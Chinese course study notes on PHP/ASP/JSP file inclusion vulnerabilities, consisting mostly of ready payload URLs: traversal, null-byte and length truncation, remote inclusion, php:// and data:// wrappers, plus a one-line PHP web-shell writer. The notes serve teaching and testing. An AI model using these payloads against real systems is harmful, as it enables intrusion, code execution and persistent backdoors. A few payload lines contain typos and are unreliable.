WEB漏洞-文件操作之文件包含漏洞

 免责声明： 本内容仅为【小迪安全-web渗透测试】的学习笔记，仅用于技术研究，禁止使用文章中的技术进行非法行为，如利用文章中技术进行非法行为造成的后果与本文作者无关。

文件包含漏洞

原理，检测，类型，利用，修复等

文件包含各个脚本代码

ASP，PHP，JSP，ASPX等

<!--#include file="1.asp" -->
<!--#include file="top.aspx" -->
<c:import url="http://thief.one/1.jsp">
<jsp:include page="head.jsp"/>
<%@ include file="head.jsp"%>
<?php Include('test.php')?>

本地包含-无限制，有限制

http://127.0.0.1:8080/include.php?filename=1.txt
http://127.0.0.1:8000/include.php?filename=../../../www.txt
%00截断：条件：magic_quotes_gpc=Off php版本<5.3.4
filename=../../../www.txt%00
推荐方法：长度阶段：条件：windows，点号需要长于256；linux长于4096
(例如：windows:1.txt/././././././././././././././././././././././././././././././././././././././././././././
linux：1.txt............................................................................................................................)

远程包含-无限制，有限制 PHP Core ：allow_url_include：on on

http://127.0.0.1:8080/iclude.php?filename=http://www.xiaodi8.com/readme.txt
http://127.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt%20
http://127.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt%23
http://127.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt?

何种协议流玩法

https://www.cnblogs.com/endust/p/11804767.html
http://127.0.0.1:8080/include.php?filename=php://filter/convert.base64-encode/resource=1.txt
http://127.0.0.1:8080/include.php?filename=php://input POST:<?php system('ver')?>
<?php fputs(fopen('s.php'，'w'),'<?php @eval($_POST[cmd])?>';?>
http://127.0.0.1:8000/include.php?filename=file:///D:/phpstudy/PHPTutorial/www/1.txt
http://127.0.0.1:8080/include.php?filename=data://text/plain,<?php%20phpinfo();?>

协议	测试PHP版本	allow_url_fopen	allow_rul_include	用法
file://	>=5.2	off/on	off/on	?file=file://D:/soft/phpStudy/WWW/phpcode.txt
php://filter	>=5.2	off/on	off/on	?file=php://filter/read=convert.base64-encode/resource=./index.php
php://input	>=5.2	off/on	on	?file=php://input 【POST DATA】 <?php phpinfo()?>
zip://	>=5.2	off/on	off/on	?file=zip://D:/soft/phpStudy/WWW/file.zip%23phpcode.txt
compress.bzip2://	>=5.2	off/on	off/on	?file=compress.bzip2://D:/soft/phpStudy/WWW/file.bz2 【or】 ?file=compress.bzip2://./file.bz2
compress.zlib://	>=5.2	off/on	off/on	?file=compress.bzip2://D:/soft/phpStudy/WWW/file.gz 【or】 ?file=compress.zlib://./file.gz
data://	>=5.2	on	on	?file-data://text/plain,<?php phponfo()?> 【or】 ?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4= 也可以： ?file=data:text/plain,<?php phpinfo()?> 【or】 ?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

来自：https://www.yuque.com/gemaxianrenhm/hahwdw/oa1x0d